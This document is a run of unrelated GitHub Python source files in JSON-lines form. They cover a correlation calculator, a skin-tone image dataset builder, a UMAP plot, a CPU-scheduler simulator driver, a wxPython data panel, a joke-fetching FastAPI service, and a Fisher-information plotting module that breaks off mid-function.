name)\r\n if not os.path.exists(gene_directory):\r\n os.makedirs(gene_directory)\r\n\r\n # Create the absolute path of the file by joining the source directory with the file name\r\n source_file = os.path.join(source_directory, dir, file)\r\n\r\n # Copy the file to the gene's subdirectory within the destination directory\r\n destination_file = os.path.join(gene_directory, file)\r\n print(\"Copying file: \" + source_file + \" to \" + destination_file)\r\n shutil.copy(source_file, destination_file)\r\n\r\n print(\"File copying process completed.\")\r\n\r\nif __name__ == \"__main__\":\r\n download_data()\r\n create_dataset()","repo_name":"edwo314/bachelor_thesis_trypanosoma","sub_path":"get_flagella_dataset.py","file_name":"get_flagella_dataset.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"17307274383","text":"\nX = list(map(float, input().split()))\nY = list(map(float, input().split()))\n#print(phy,his)\n\nx_mean = sum(X)/len(X)\ny_mean = sum(Y)/len(Y)\n\nx_y = list(map(lambda x, y: (x-x_mean) * (y-y_mean), X, Y))\nx_x = list(map(lambda x: (x-x_mean)*(x-x_mean), X))\ny_y = list(map(lambda y: 
(y-y_mean)*(y-y_mean), Y))\n\nnumerator = sum(x_y)\ndenum = pow(sum(x_x), 0.5) * pow(sum(y_y), 0.5)\n\nr = round(numerator/denum, 3)\n\nprint(r)","repo_name":"Atulnitp/Statistical-Analysis","sub_path":"CorrelationAndRegressionLine.py","file_name":"CorrelationAndRegressionLine.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"17494148660","text":"# 데이터셋 생성 (멀티프로세싱)\n# 최초 작성일 : 20/03/06\n# 작성자 : 양희승\n#\n# 작성내용 : 데이터셋 생성 속도 개선\n\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))))\nsys.path.append('F:/hs/pythonwork/project/cys')\n\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport cv2 as cv\nfrom cys import color_classifier # 예스리 임포트\nimport color_classifier\nimport colour\nimport warnings\nimport multiprocessing\n\nwarnings.filterwarnings(action='ignore')\n# warnings.filterwarnings(action='default')\n############################################################\n\ndef color_ratio(clt) :\n numLabels = np.arange(0, len(np.unique(clt.labels_))+1)\n (hist, _) = np.histogram(clt.labels_, bins=numLabels)\n hist = hist.astype(\"float\")\n hist /= hist.sum()\n return hist\n\n# k=5이므로 다섯개의 영역에 얼마만큼의 퍼센테이지가 차지되었는지 return된다.\n\ndef plot_colors(hist, centroids):\n bar = np.zeros((50, 300, 3), dtype = \"uint8\")\n startX = 0\n\n for (percent, color) in zip(hist, centroids):\n endX = startX + (percent * 300)\n cv.rectangle(bar, (int(startX), 0), (int(endX), 50),\n color.astype(\"uint8\").tolist(), -1)\n startX = endX\n return bar\n\n\ndef skin_detector(img, file_name):\n # 피부 검출1\n lower = np.array([0, 48, 80], dtype=\"uint8\")\n upper = np.array([20, 255, 255], dtype=\"uint8\")\n\n converted = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n skinMask = cv.inRange(converted, lower, upper)\n\n kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (11, 11))\n skinMask = cv.erode(skinMask, kernel, iterations=2)\n skinMask = cv.dilate(skinMask, kernel, iterations=2)\n\n skinMask = cv.GaussianBlur(skinMask, (3, 3), 0)\n skin = cv.bitwise_and(img, img, mask=skinMask)\n\n result = skin\n # plt.imshow(result)\n # plt.show()\n\n img = cv.cvtColor(result, cv.COLOR_BGR2HLS)\n skin_img = img\n temp_img = cv.cvtColor(img, cv.COLOR_HLS2RGB)\n\n h, w, c = img.shape\n\n for i in range(h):\n for j in range(w):\n H = img[i][j][0]\n L = img[i][j][1]\n S = img[i][j][2]\n\n R = temp_img[i][j][0]\n G = temp_img[i][j][1]\n B = temp_img[i][j][2]\n\n LS_ratio = L / S\n skin_pixel = bool((S >= 50) and (LS_ratio > 0.5) and (LS_ratio < 3.0) and ((H <= 25) or (H >= 165)))\n temp_pixel = bool((R == G) and (G == B) and (R >= 220))\n\n if skin_pixel:\n if temp_pixel:\n skin_img[i][j][0] = 0\n skin_img[i][j][1] = 0\n skin_img[i][j][2] = 0\n else:\n pass\n else:\n skin_img[i][j][0] = 0\n skin_img[i][j][1] = 0\n skin_img[i][j][2] = 0\n\n skin_img = cv.cvtColor(skin_img, cv.COLOR_HLS2BGR)\n for i in range(h):\n for j in range(w):\n B = skin_img[i][j][0]\n G = skin_img[i][j][1]\n R = skin_img[i][j][2]\n\n bg_pixel = bool(B == 0 and G == 0 and R == 0)\n\n if bg_pixel:\n skin_img[i][j][0] = 255\n skin_img[i][j][1] = 255\n skin_img[i][j][2] = 255\n else:\n pass\n\n # plt.imshow(skin_img)\n # plt.show()\n\n cvt_img = cv.cvtColor(skin_img, cv.COLOR_BGR2RGB)\n # plt.imshow(cvt_img)\n # plt.show()\n\n cvt_img = cvt_img.reshape((cvt_img.shape[0] * cvt_img.shape[1], 3))\n k = 20\n clt = KMeans(n_clusters=k)\n clt.fit(cvt_img)\n\n hist = color_ratio(clt)\n temp = 
np.array(clt.cluster_centers_)\n\n # hist에서 높은 값 제거, cluster_centers_에서도 제거)\n del_index = hist.argmax()\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n try:\n\n # hist에서 제일 낮은 값 제거, cluster_centers_ 에서도 제거\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0) # 3\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0) # 4\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0) # 5\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n\n del_index = np.argmin(hist)\n hist = np.delete(hist, del_index)\n temp = np.delete(temp, del_index, 0)\n except ValueError:\n print(file_name, \"에러\")\n cv.imwrite(\"../dataset/value_error/\"+file_name+\".png\", img)\n pass\n\n # 비율 재조정\n hist = hist / hist.sum()\n ####################################\n\n # 그래프 그리기\n bar = plot_colors(hist, temp)\n\n # plt.figure()\n # plt.axis(\"off\")\n # plt.imshow(bar)\n # plt.show()\n\n # RGB변환 후 저장\n bar = cv.cvtColor(bar, cv.COLOR_BGR2RGB)\n # cv.imwrite(\"../img/\"+file_name+\"_test.jpg\", bar)\n\n return bar\n\n\ndef color_convert(cheek, file_name):\n img = cheek\n img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n # plt.imshow(img)\n # plt.show()\n\n sum = 0\n R = []\n G = []\n B = []\n for i in img:\n for j in i:\n R.append(j[0])\n G.append(j[1])\n B.append(j[2])\n\n R_sum = 0\n G_sum = 0\n B_sum = 0\n\n # 각 R, G, B의 합계 구하기\n for i in range(len(R)):\n R_sum += R[i]\n G_sum += G[i]\n B_sum += B[i]\n\n R_avg = int(round((R_sum / len(R)), 0)) # R값 평균\n G_avg = int(round((G_sum / len(G)), 0)) # G값 평균\n B_avg = int(round((B_sum / len(B)), 0)) # B값 평균\n RGB_color = [R_avg, G_avg, B_avg]\n\n # 평균 색만 그래프 그리기 위함 img_avg\n img_avg = img\n\n for i in img_avg:\n for j in i:\n j[0] = R_avg\n j[1] = G_avg\n j[2] = B_avg\n\n # 기존\n # plt.imshow(img)\n # plt.show()\n\n # 평균색\n # plt.imshow(img_avg)\n # plt.show()\n bgr_img_avg = cv.cvtColor(img_avg, cv.COLOR_RGB2BGR)\n\n # 저장\n # cv.imwrite(\"../img/\"+file_name+\"_9.jpg\", bgr_img_avg)\n\n arr_RGB_color = np.array(RGB_color)\n float_arr_RGB_color = arr_RGB_color / 255\n float_tp_RGB_color = tuple(float_arr_RGB_color)\n HSV_color = colour.RGB_to_HSV(float_tp_RGB_color)\n HSV_color2 = np.array(\n [round(HSV_color[0] * 359, 3), round(HSV_color[1] * 100, 3) - 4, round(HSV_color[2] * 100, 3) + 8])\n HSV_color2 = list(HSV_color2)\n HSV_color2[0] = round(HSV_color2[0], 2)\n HSV_color2[1] = round(HSV_color2[1], 2)\n HSV_color2[2] = round(HSV_color2[2], 2)\n return HSV_color2\n\n\ndef save_img(img, file_name, 
skin_type):\n if skin_type == 0:\n cv.imwrite(\"../dataset/00/\" + file_name + \".png\", img)\n elif skin_type == 1:\n cv.imwrite(\"../dataset/01/\" + file_name + \".png\", img)\n elif skin_type == 2:\n cv.imwrite(\"../dataset/02/\" + file_name + \".png\", img)\n elif skin_type == 3:\n cv.imwrite(\"../dataset/03/\" + file_name + \".png\", img)\n elif skin_type == 4:\n cv.imwrite(\"../dataset/04/\" + file_name + \".png\", img)\n elif skin_type == 5:\n cv.imwrite(\"../dataset/05/\" + file_name + \".png\", img)\n elif skin_type == 6:\n cv.imwrite(\"../dataset/06/\" + file_name + \".png\", img)\n elif skin_type == 7:\n cv.imwrite(\"../dataset/07/\" + file_name + \".png\", img)\n elif skin_type == -1:\n cv.imwrite(\"../dataset/error/\" + file_name + \".png\", img)\n print(\"분류오류 : \", file_name)\n else:\n cv.imwrite(\"../dataset/value_error/\" + file_name + \".png\", img)\n print(\"타입오류 : \", file_name, \" 타입번호 : \", skin_type)\n\ndef get_count(num, p=4):\n lists = []\n allocate = int(num / p)\n for n in range(p):\n lists.append(allocate)\n\n lists[p - 1] += num % p\n print(\"프로세스 할당량 :\", lists)\n return lists\n\ndef work(start_num, end_num) :\n for i in range(start_num, end_num, 1):\n ## 이미지 로드\n file_name = \"img (\" + str(i) + \")\"\n img = cv.imread(\"../crop/\" + file_name + \".png\")\n\n # 이미지 색 비율 추출\n bar = skin_detector(img, file_name)\n\n ## 평균색으로 변형\n hsv = color_convert(bar, file_name)\n\n # 예슬's 피부타입 분류 함수\n color_class = color_classifier.Color()\n skin_type = color_class.color_classifier(hsv)\n save_img(img, file_name, skin_type)\n\ncolor_type = [\"WSB\", \"WSL\", \"WAD\", \"WAM\", \"CSL\", \"CSM\", \"CWB\", \"CWD\"]\n\n\nif __name__ == \"__main__\" :\n\n num = int(1000)\n process_num = 4\n\n process = []\n start_num = 1\n end_num = 1\n for count in get_count(num, process_num):\n end_num += count\n print(\"실행 범위\", start_num, \"~\", end_num)\n p = multiprocessing.Process(target=work, args=(start_num, end_num))\n start_num += count\n process.append(p)\n p.start()\n\n for p in process:\n p.join\n","repo_name":"slmteruto/CAI","sub_path":"yhs/pycharm/skin_type_dataset_create.py","file_name":"skin_type_dataset_create.py","file_ext":"py","file_size_in_byte":10161,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"34799849427","text":"import umap\nimport umap.plot\nimport numpy as np\nfrom scipy.io import savemat\n\nA = np.load('../FEATURES/Time_signal_stats.npy')\nA = np.delete(A, slice(384*2, 384*4), 0)\n\n# target = np.concatenate((np.ones((100,)), 2*np.ones((100,)), 3*np.ones((100,))), axis=0)\ntarget = np.concatenate((np.ones((384,)), 2*np.ones((384,)), 3*np.ones((384,)), 4*np.ones((384,)), 5*np.ones((384,)), 6*np.ones((384,))), axis=0)\nprint(A.shape)\nprint(target.shape)\nmapper = umap.UMAP(n_neighbors=15,\n min_dist=0.3,\n metric='manhattan').fit(A)\ndata={'embedA':mapper.embedding_}\n# savemat(\"PDE2D_EC_N10_Umap.mat\", data)\np = umap.plot.points(mapper, labels=target)\numap.plot.show(p)","repo_name":"ZZKnight/EC-PDE","sub_path":"Stat_Umap.py","file_name":"Stat_Umap.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"27515918509","text":"from processo import Processo\nfrom cpu import Cpu\nimport random\n\nprocessos = []\n\n# Solicita ao usuário qual escalonador ele quer usar\nescalonador = input(\"Digite 1 para Round Robin ou 2 para Shortest-Job-First: \")\nif escalonador != '1' and escalonador != '2':\n raise 
Exception(f'Modo de Escalanador {escalonador} invalido') \nProcesso.setEscalanador(escalonador)\n\nquantidade_programas = int(\n input(\"Digite a quantidade de programas que deseja criar: \"))\n # Cria uma instancia da CPU\n\ncpu_ = Cpu(quantidade_programas, escalonador)\n\n# Solicita ao usuário a quantidade de programas que deseja criar\n# Cria um loop para receber as informações de cada processo\nfor i in range(quantidade_programas):\n arquivo = input(f\"Qual o nome do arquivo {i+1}? \")\n tempo_chegada = int(input(\"Qual o tempo de chegada? \"))\n prioridade = int(input(\"Qual a prioridade do processo? \"))\n quantum = int(input(\"Qual o quantum do processo? \"))\n tempo_execucao = int(input(\"Qual o tempo de execução do processo? \"))\n print()\n #Cria um processo\n process = Processo(tempo_chegada=tempo_chegada,\n prioridade=prioridade, quantum=quantum, tempo_execucao=tempo_execucao)\n process.carregar_instrucoes(arquivo)\n process.compile()\n cpu_.adicionar_processo(process)\n #Carrega as instruções que estão no arquivo.txt na lógica do processo que foi criado\n\n# process = Processo(tempo_chegada=0, prioridade=0, quantum=25, tempo_execucao=80)\n# process.carregar_instrucoes('programa04.txt')\n# process.compile() \n# cpu_.adicionar_processo(process)\n# process2 = Processo(tempo_chegada=10, prioridade=1, quantum=1, tempo_execucao=4)\n# process2.carregar_instrucoes('programa01.txt')\n# process2.compile() \n# cpu_.adicionar_processo(process2)\n# process3 = Processo(tempo_chegada=12, prioridade=0, quantum=25, tempo_execucao=5)\n# process3.carregar_instrucoes('programa04.txt')\n# process3.compile() \n# cpu_.adicionar_processo(process3)\ncpu_.run()","repo_name":"Specht1000/TP1-SiSop","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34715173536","text":"__author__ = 'yzhou7'\r\n\r\nimport wx\r\n\r\nfrom src.DAL.DailyDataDAL import DailyDataDAL\r\nfrom src.UI.UserData import UserGridData\r\nfrom src.Util.TimeUtil import TimeUtil\r\n\r\n\r\n# this class provides entry point for all clients\r\n# it should have the following functions:\r\n# 1. view all buyers's data\r\n# 2. query single buyer'data\r\n# 3. 
clean up out-of-data data\r\n\r\nclass BuyerPanel(wx.Panel):\r\n\r\n def __init__(self, parent):\r\n wx.Panel.__init__(self, parent)\r\n self.SetBackgroundColour(\"white\")\r\n self.initUI()\r\n self.Show(True)\r\n\r\n def initUI(self):\r\n self.vBox = wx.BoxSizer(wx.VERTICAL)\r\n\r\n self.setupDateInput()\r\n self.displayTodayData()\r\n\r\n self.SetSizer(self.vBox)\r\n self.vBox.Layout()\r\n\r\n def setupDateInput(self):\r\n\r\n sizer = wx.GridBagSizer(4, 4)\r\n dateText = wx.StaticText(self, label='日期')\r\n sizer.Add(dateText, pos=(0, 0), flag=wx.EXPAND | wx.TOP | wx.LEFT, border=15)\r\n\r\n self.dateInput = wx.TextCtrl(self, value=TimeUtil.getToday(), style=wx.TE_PROCESS_ENTER)\r\n self.Bind(wx.EVT_TEXT_ENTER, self.onSearchDate, self.dateInput)\r\n sizer.Add(self.dateInput, pos=(0, 1),\r\n flag=wx.TOP | wx.LEFT, border=12)\r\n\r\n self.calculateButton = wx.Button(self, label='计算一天战况', size=(100, 30))\r\n sizer.Add(self.calculateButton, pos=(0, 2), flag=wx.EXPAND | wx.TOP | wx.LEFT, border=12)\r\n self.calculateButton.Enable(True)\r\n self.Bind(wx.EVT_TEXT, self.OnEnter, self.dateInput)\r\n self.Bind(wx.EVT_BUTTON, self.onSearchDate, self.calculateButton)\r\n\r\n self.warnMsg = wx.StaticText(self, label='非法日期,请重新输入')\r\n self.warnMsg.SetForegroundColour('red')\r\n sizer.Add(self.warnMsg, pos=(0, 3), flag=wx.TOP | wx.LEFT, border=15)\r\n self.warnMsg.Hide()\r\n\r\n self.vBox.Add(sizer, wx.ALIGN_TOP, 10)\r\n\r\n def displayTodayData(self):\r\n sizer = wx.GridBagSizer(4, 4)\r\n today = TimeUtil.getToday()\r\n # Load buyer data\r\n dailyData = DailyDataDAL.fetchAllByDate(today)\r\n\r\n # set data into data grid\r\n self.data = UserGridData()\r\n self.data.InsertRows(dailyData.toStringList())\r\n self.grid = wx.grid.Grid(self, size=(500, 300))\r\n self.grid.SetTable(self.data)\r\n self.grid.AutoSize()\r\n sizer.Add(self.grid, pos=(1, 1), span=(3, 3), flag=wx.EXPAND | wx.TOP, border=5)\r\n\r\n searchText = wx.StaticText(self, label='名称')\r\n sizer.Add(searchText, pos=(4, 1), flag=wx.EXPAND, border=5)\r\n\r\n self.searchInput = wx.TextCtrl(self, style=wx.TE_PROCESS_ENTER)\r\n self.Bind(wx.EVT_TEXT_ENTER, self.onSearchName, self.searchInput)\r\n sizer.Add(self.searchInput, pos=(4, 2),\r\n flag=wx.EXPAND | wx.LEFT | wx.RIGHT, border=5)\r\n\r\n\r\n self.searchBtn = wx.Button(self, label='查找', size=(100, 20))\r\n sizer.Add(self.searchBtn, pos=(4, 3))\r\n self.searchBtn.Enable(True)\r\n self.Bind(wx.EVT_BUTTON, self.onSearchName, self.searchBtn)\r\n\r\n sizer.AddGrowableRow(1)\r\n self.vBox.Add(sizer, wx.ALIGN_BOTTOM, 10)\r\n\r\n def updateGrid(self, rows):\r\n self.grid.ClearGrid()\r\n self.data.InsertRows(rows)\r\n self.grid.SetTable(self.data)\r\n self.grid.AutoSize()\r\n self.vBox.Layout()\r\n\r\n def OnEnter(self, evt):\r\n if TimeUtil.isValidDate(self.dateInput.GetValue()):\r\n self.warnMsg.Hide()\r\n self.calculateButton.Enable(True)\r\n else:\r\n self.warnMsg.Show()\r\n # re-layout\r\n self.vBox.Layout()\r\n self.calculateButton.Enable(False)\r\n\r\n def onSearchName(self, evt):\r\n dailyData = DailyDataDAL.fetchByNameDate(self.dateInput.GetValue(), self.searchInput.GetValue())\r\n self.updateGrid(dailyData.toStringList())\r\n\r\n def onSearchDate(self, evt):\r\n dailyData = DailyDataDAL.fetchAllByDate(self.dateInput.GetValue())\r\n 
self.updateGrid(dailyData.toStringList())\r\n","repo_name":"AaronGeist/GameStatistics","sub_path":"src/UI/BuyerPanel.py","file_name":"BuyerPanel.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7911429807","text":"import random\n\nfrom fastapi import Depends\n\nfrom retosquadmakers.services.joke.enums import JokeProviderEnum\nfrom retosquadmakers.services.joke.repositories import Repository\n\n\nclass JokeService:\n\n def __init__(self, repository: Repository = Depends()):\n self.repositories = repository\n\n async def get_joke(self, provider: JokeProviderEnum | None):\n if provider == JokeProviderEnum.Chuck:\n return await self.repositories.chuck_norris_repository.get_random_joke()\n if provider == JokeProviderEnum.Dad:\n return await self.repositories.can_haz_dad_joke_repository.get_random_joke()\n if provider == JokeProviderEnum.Random or provider is None:\n providers = [self.repositories.chuck_norris_repository, self.repositories.can_haz_dad_joke_repository]\n provider = providers[random.randint(0, len(providers) - 1)]\n return await provider.get_random_joke()\n","repo_name":"Ventura94/RetoSquadMakers","sub_path":"retosquadmakers/services/joke/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"23653226412","text":"import logging\nimport matplotlib\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nlogger = logging.getLogger(__name__)\n\n\ndef plot_fisher_information_contours_2d(\n fisher_information_matrices,\n fisher_information_covariances=None,\n reference_thetas=None,\n contour_distance=1.0,\n xlabel=r\"$\\theta_0$\",\n ylabel=r\"$\\theta_1$\",\n xrange=(-1.0, 1.0),\n yrange=(-1.0, 1.0),\n labels=None,\n inline_labels=None,\n resolution=500,\n colors=None,\n linestyles=None,\n linewidths=1.5,\n alphas=1.0,\n alphas_uncertainties=0.25,\n sigma_uncertainties=1,\n ax=None,\n):\n \"\"\"\n Visualizes 2x2 Fisher information matrices as contours of constant Fisher distance from a reference point `theta0`.\n\n The local (tangent-space) approximation is used: distances `d(theta)` are given by\n `d(theta)^2 = (theta - theta0)_i I_ij (theta - theta0)_j`, summing over `i` and `j`.\n\n Parameters\n ----------\n fisher_information_matrices : list of ndarray\n Fisher information matrices, each with shape (2,2).\n\n fisher_information_covariances : None or list of (ndarray or None), optional\n Covariance matrices for the Fisher information matrices. Has to have the same length as\n fisher_information_matrices, and each entry has to be None (no uncertainty) or a tensor with shape\n (2,2,2,2). Default value: None.\n\n reference_thetas : None or list of (ndarray or None), optional\n Reference points from which the distances are calculated. If None, the origin (0,0) is used. Default value:\n None.\n\n contour_distance : float, optional.\n Distance threshold at which the contours are drawn. Default value: 1.\n\n xlabel : str, optional\n Label for the x axis. Default value: r'$\\theta_0$'.\n\n ylabel : str, optional\n Label for the y axis. Default value: r'$\\theta_1$'.\n\n xrange : tuple of float, optional\n Range `(min, max)` for the x axis. Default value: (-1., 1.).\n\n yrange : tuple of float, optional\n Range `(min, max)` for the y axis. Default value: (-1., 1.).\n\n labels : None or list of (str or None), optional\n Legend labels for the contours. 
Default value: None.\n\n inline_labels : None or list of (str or None), optional\n Inline labels for the contours. Default value: None.\n\n resolution : int\n Number of points per axis for the calculation of the distances. Default value: 500.\n\n colors : None or str or list of str, optional\n Matplotlib line (and error band) colors for the contours. If None, uses default colors. Default value: None.\n\n linestyles : None or str or list of str, optional\n Matploitlib line styles for the contours. If None, uses default linestyles. Default value: None.\n\n linewidths : float or list of float, optional\n Line widths for the contours. Default value: 1.5.\n\n alphas : float or list of float, optional\n Opacities for the contours. Default value: 1.\n\n alphas_uncertainties : float or list of float, optional\n Opacities for the error bands. Default value: 0.25.\n\n sigma_uncertainties : float, optional\n Number of gaussian sigmas used when presenting uncertainty bands. Default value: 1.\n\n ax: axes or None, optional\n Predefined axes as part of figure instead of standalone figure. Default: None\n\n Returns\n -------\n figure : Figure\n Plot as Matplotlib Figure instance.\n\n \"\"\"\n # Input data\n fisher_information_matrices = np.asarray(fisher_information_matrices)\n\n n_matrices = fisher_information_matrices.shape[0]\n\n if fisher_information_matrices.shape != (n_matrices, 2, 2):\n raise RuntimeError(f\"Fisher information matrices have shape {fisher_information_matrices.shape}. Not (n, 2,2)!\")\n\n if fisher_information_covariances is None:\n fisher_information_covariances = [None for _ in range(n_matrices)]\n\n if reference_thetas is None:\n reference_thetas = [None for _ in range(n_matrices)]\n\n d2_threshold = contour_distance**2.0\n\n # Line formatting\n if colors is None:\n colors = [\"C\" + str(i) for i in range(10)] * (n_matrices // 10 + 1)\n elif not isinstance(colors, list):\n colors = [colors for _ in range(n_matrices)]\n\n if linestyles is None:\n linestyles = [\"solid\", \"dashed\", \"dotted\", \"dashdot\"] * (n_matrices // 4 + 1)\n elif not isinstance(linestyles, list):\n linestyles = [linestyles for _ in range(n_matrices)]\n\n if not isinstance(linewidths, list):\n linewidths = [linewidths for _ in range(n_matrices)]\n\n if not isinstance(alphas, list):\n alphas = [alphas for _ in range(n_matrices)]\n\n if not isinstance(alphas_uncertainties, list):\n alphas_uncertainties = [alphas_uncertainties for _ in range(n_matrices)]\n\n # Grid\n xi = np.linspace(xrange[0], xrange[1], resolution)\n yi = np.linspace(yrange[0], yrange[1], resolution)\n xx, yy = np.meshgrid(xi, yi, indexing=\"xy\")\n xx, yy = xx.flatten(), yy.flatten()\n thetas = np.vstack((xx, yy)).T\n\n # Theta from reference thetas\n d_thetas = []\n for reference_theta in reference_thetas:\n if reference_theta is None:\n d_thetas.append(thetas)\n else:\n d_thetas.append(thetas - reference_theta)\n d_thetas = np.array(d_thetas) # Shape (n_matrices, n_thetas, n_parameters)\n\n # Calculate Fisher distances\n fisher_distances_squared = np.einsum(\"mni,mij,mnj->mn\", d_thetas, fisher_information_matrices, d_thetas)\n fisher_distances_squared = fisher_distances_squared.reshape((n_matrices, resolution, resolution))\n\n # Calculate uncertainties of Fisher distances\n fisher_distances_squared_uncertainties = []\n for d_theta, inf_cov in zip(d_thetas, fisher_information_covariances):\n if inf_cov is None:\n fisher_distances_squared_uncertainties.append(None)\n continue\n\n var = np.einsum(\"ni,nj,ijkl,nk,nl->n\", d_theta, d_theta, 
inf_cov, d_theta, d_theta)\n\n uncertainties = (var**0.5).reshape((resolution, resolution))\n fisher_distances_squared_uncertainties.append(uncertainties)\n\n logger.debug(\"Std: %s\", uncertainties)\n\n # Plot results\n do_fig = False\n if ax is None:\n do_fig = True\n fig = plt.figure(figsize=(5.0, 5.0))\n ax = plt.gca()\n\n # Error bands\n for i in range(n_matrices):\n if fisher_information_covariances[i] is not None:\n d2_up = fisher_distances_squared[i] + sigma_uncertainties * fisher_distances_squared_uncertainties[i]\n d2_down = fisher_distances_squared[i] - sigma_uncertainties * fisher_distances_squared_uncertainties[i]\n band = (d2_up > d2_threshold) * (d2_down < d2_threshold) + (d2_up < d2_threshold) * (d2_down > d2_threshold)\n\n plt.contourf(xi, yi, band, [0.5, 2.5], colors=colors[i], alpha=alphas_uncertainties[i])\n\n # Predictions\n for i in range(n_matrices):\n cs = ax.contour(\n xi,\n yi,\n fisher_distances_squared[i],\n np.array([d2_threshold]),\n colors=colors[i],\n linestyles=linestyles[i],\n linewidths=linewidths[i],\n alpha=alphas[i],\n label=None if labels is None else labels[i],\n )\n\n if inline_labels is not None and inline_labels[i] is not None and len(inline_labels[i]) > 0:\n ax.clabel(cs, cs.levels, inline=True, fontsize=12, fmt={d2_threshold: inline_labels[i]})\n\n # Legend and decorations\n if labels is not None:\n ax.legend()\n\n if do_fig:\n plt.axes().set_xlim(xrange)\n plt.axes().set_ylim(yrange)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.tight_layout()\n return fig\n else:\n return ax\n\n\ndef plot_fisherinfo_barplot(\n fisher_information_matrices,\n labels,\n determinant_indices=None,\n eigenvalue_colors=None,\n bar_colors=None,\n):\n \"\"\"\n\n Parameters\n ----------\n fisher_information_matrices : list of ndarray\n Fisher information matrices\n\n labels : list of str\n Labels for the x axis\n\n determinant_indices : list of int or None, optional\n If not None, the determinants will be based only on the indices given here. Default value: None.\n\n eigenvalue_colors : None or list of str\n Colors for the eigenvalue decomposition. If None, default colors are used. Default value: None.\n\n bar_colors : None or list of str\n Colors for the determinant bars. If None, default colors are used. 
Default value: None.\n\n Returns\n -------\n figure : Figure\n Plot as Matplotlib Figure instance.\n\n \"\"\"\n\n # Prepare data\n if determinant_indices is None:\n matrices_for_determinants = fisher_information_matrices\n else:\n matrices_for_determinants = [m[determinant_indices, determinant_indices] for m in fisher_information_matrices]\n\n size_upper = len(fisher_information_matrices[1])\n size_lower = len(matrices_for_determinants[1])\n exponent_lower = 1.0 / float(size_lower)\n\n determinants = [np.linalg.det(m) ** exponent_lower for m in matrices_for_determinants]\n\n assert len(determinants) == len(labels)\n n_entries = len(determinants)\n\n # Calculate eigenvalues + eigenvalue composition\n eigenvalues = []\n eigenvalues_dominant_components = []\n eigenvalues_composition = []\n\n for m in fisher_information_matrices:\n v, w = np.linalg.eig(m)\n w = np.transpose(w)\n v, w = zip(*sorted(zip(v, w), key=lambda x: x[0], reverse=True))\n temp = []\n temp_dominant_components = []\n temp_composition = []\n for vi, wi in zip(v, w):\n temp.append(vi)\n temp_dominant_components.append(np.argmax(np.absolute(wi)))\n temp_composition.append(wi * wi / (sum(wi * wi)))\n\n eigenvalues.append(temp)\n eigenvalues_dominant_components.append(temp_dominant_components)\n eigenvalues_composition.append(temp_composition)\n\n # x positioning\n base_xvalues = np.linspace(0.0, float(n_entries) - 1.0, n_entries)\n base_xmin = base_xvalues[0]\n base_xmax = base_xvalues[n_entries - 1] + 1.0\n xmin_eigenvalues = base_xvalues + 0.08\n xmax_eigenvalues = base_xvalues + 0.92\n xpos_ticks = base_xvalues + 0.5\n xpos_lower = base_xvalues + 0.5\n width_lower = 0.8\n\n # Colors\n if bar_colors is None:\n bar_colors = [\"0.5\" for _ in range(n_entries)]\n bar_colors_light = [\"0.9\" for _ in range(n_entries)]\n else:\n bar_colors_light = bar_colors\n\n if eigenvalue_colors is None:\n eigenvalue_colors = [f\"C{i}\" for i in range(10)]\n eigenvalue_linewidth = 1.5\n\n # Upper plot\n fig = plt.figure(figsize=(10.0, 7.0))\n ax1 = plt.subplot(211)\n\n # Plot eigenvalues\n for i in range(n_entries):\n for eigenvalue, composition in zip(eigenvalues[i], eigenvalues_composition[i]):\n # Gap sizing\n n_gaps = -1\n minimal_fraction_for_plot = 0.01\n for fraction in composition:\n if fraction >= minimal_fraction_for_plot:\n n_gaps += 1\n gap_fraction = 0.04\n gap_correction_factor = 1.0 - n_gaps * gap_fraction\n\n fraction_finished = 0.0\n\n for component, fraction in enumerate(composition):\n if fraction >= minimal_fraction_for_plot:\n plt.hlines(\n [eigenvalue],\n xmin_eigenvalues[i] + fraction_finished * (xmax_eigenvalues[i] - xmin_eigenvalues[i]),\n 